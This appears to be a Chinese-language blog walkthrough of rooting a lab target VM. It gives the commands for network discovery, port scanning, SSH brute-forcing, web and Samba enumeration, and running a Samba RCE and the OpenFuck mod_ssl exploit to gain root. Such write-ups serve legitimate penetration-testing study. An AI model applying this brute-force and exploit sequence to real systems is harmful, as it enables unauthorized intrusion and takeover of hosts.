0x01 取得靶機IP
netdiscover -r x.x.x.0/24
data:image/s3,"s3://crabby-images/a3381/a338104b68e03b3cd5cea45774da4873b37f5ffc" alt=""
0x02 服務探勘
nmap -sS -A -sV --version-intensity 5 -Pn -T4 -p- <ip>
data:image/s3,"s3://crabby-images/91108/91108f5da0e0ccd0e492c2587d4fae29cd82b000" alt=""
data:image/s3,"s3://crabby-images/d670f/d670ff6da518e855a819dcc64183912cb5c9b38f" alt=""
0x03 ssh爆破
nmap <ip> -p 22 --script ssh-brute --script-args userdb=users.lst,passdb=pass.lst --script-args ssh-brute.timeout=4s
data:image/s3,"s3://crabby-images/322cc/322cc9ff0331a18389ee4debed93eb2def4c248b" alt=""
找不到帳密,換下個目標
0x04 Web掃描
nikto -h <ip>
data:image/s3,"s3://crabby-images/5477e/5477eef31ab535fad7ca870e888ca684d42badcf" alt=""
dirbuster
data:image/s3,"s3://crabby-images/ed8ba/ed8badf701f65402d95c19fcaa31fee20eb25d2c" alt=""
data:image/s3,"s3://crabby-images/eb5bd/eb5bd62684b2bd9c1c93bb1fc1de5c436244902c" alt=""
沒什麼可利用的資訊
0x05 samba探測
enum4linux -o <ip>
data:image/s3,"s3://crabby-images/81f61/81f6154e0050b81be0696e0829d21183d9b574cd" alt=""
到exploit-db根據samba版本號可找到一個RCE漏洞,編譯後執行
data:image/s3,"s3://crabby-images/9547f/9547f492f8a929e2973d005861c39c6b94c1bcb8" alt=""
data:image/s3,"s3://crabby-images/676a0/676a09787942258e9c1fc7b2f3e8e8b538b05ac1" alt=""
取得root權限
0x06 mod_ssl/2.8.4
在exploit-db上根據版本號可找到openfunk的poc,我用的是gazcbm/openfuck-2017已經編譯好的版本
先執行openfuck
data:image/s3,"s3://crabby-images/50a47/50a47f61a34d33363115ccc190c8e595c729739a" alt=""
找靶機的apache版本1.3.20
data:image/s3,"s3://crabby-images/e65f6/e65f6eb1a47bb0e6604abd4fa8ad95547e46e95e" alt=""
推測是RedHat Linux 7.2
先踹openfuck 0x6a <ip> <port> -c 50,發現無法成功
data:image/s3,"s3://crabby-images/fee37/fee37ffa61ba25d7808a626e4be6b3cf3d52fcf4" alt=""
換成openfuck 0x6b <ip> <port> -c 50
data:image/s3,"s3://crabby-images/04efe/04efe161b36edb9d5c4681ea834397596cfe0d0f" alt=""
取得root權限
沒有留言:
張貼留言